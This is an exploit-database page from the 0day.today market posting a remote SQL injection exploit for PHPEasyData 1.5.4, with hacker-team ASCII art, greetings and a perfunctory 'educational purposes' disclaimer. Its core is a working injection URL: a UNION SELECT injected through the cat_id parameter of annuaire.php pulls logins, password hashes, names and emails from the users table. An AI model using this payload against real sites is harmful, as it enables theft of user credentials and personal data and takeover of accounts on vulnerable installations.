[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHPEasyData 1.5.4 (cat_id) Remote SQL Injection Vulnerability

Author
0day Today Team
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2964
Category
web applications
Date add
05-05-2008
Platform
unsorted
=============================================================
PHPEasyData 1.5.4 (cat_id) Remote SQL Injection Vulnerability
=============================================================


|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

Title :: Remote SQL Injection
 
 
Application :: PHPEasyData 1.5.4
 
Download :: http://www.phpeasydata.com/telecharger/phpeasydata-free-edition/index_fr.html
 
Dork 1 ::  Not Yet  :P
 
Greets :: Allah , InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.

--------------------------------------------[C o n t e x t]-----------------------------------------
 
Vulnerability: http://localhost/localhost/phpeasydata-1.5.4/annuaire.php?annuaire=68&sort_field=&cat_id=4+union+select+concat_ws(0x3a3a,user_id,user_login,user_pass,user_fname,user_lname,user_access,user_email)+from+an_users/*

 
-------------------------------------------[End of  context]----------------------------------------



#  0day.today [2024-12-25]  #